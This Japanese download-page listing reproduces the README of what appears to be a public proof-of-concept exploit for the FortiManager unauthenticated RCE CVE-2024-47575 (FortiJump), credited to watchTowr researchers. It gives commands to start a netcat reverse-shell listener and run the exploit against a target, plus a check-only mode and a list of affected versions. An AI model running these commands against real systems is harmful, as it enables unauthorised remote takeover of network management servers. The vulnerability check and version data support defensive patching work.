ホーム>プログラミング関連>その他のソースコード
ダウンロード

CVE-2024-47575

フォーティネット FortiManager の認証されていないリモート コード実行、別名 FortiJump CVE-2024-47575

技術的な詳細については、ブログ投稿を参照してください

まず、ncat セッションを確立します。 

 nc -lvvnp 80

次に、検出アーティファクト ジェネレーターを実行します。 

 python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit

脆弱性のみを確認するには、次のオプションを使用します。 

 python3 CVE-2024-47575.py --target 192.168.1.110 --action check

影響を受けるバージョン

 FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

作成者を悪用する

このエクスプロイトは、watchTowr (@watchtowrcyber) の Sina Kheirkhah (@SinSinology) によって作成されました。

フォローする

最新のセキュリティ研究については、watchTowr Labs チームをフォローしてください

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
拡大する
追加情報
関連アプリ
おすすめ
関連情報 すべて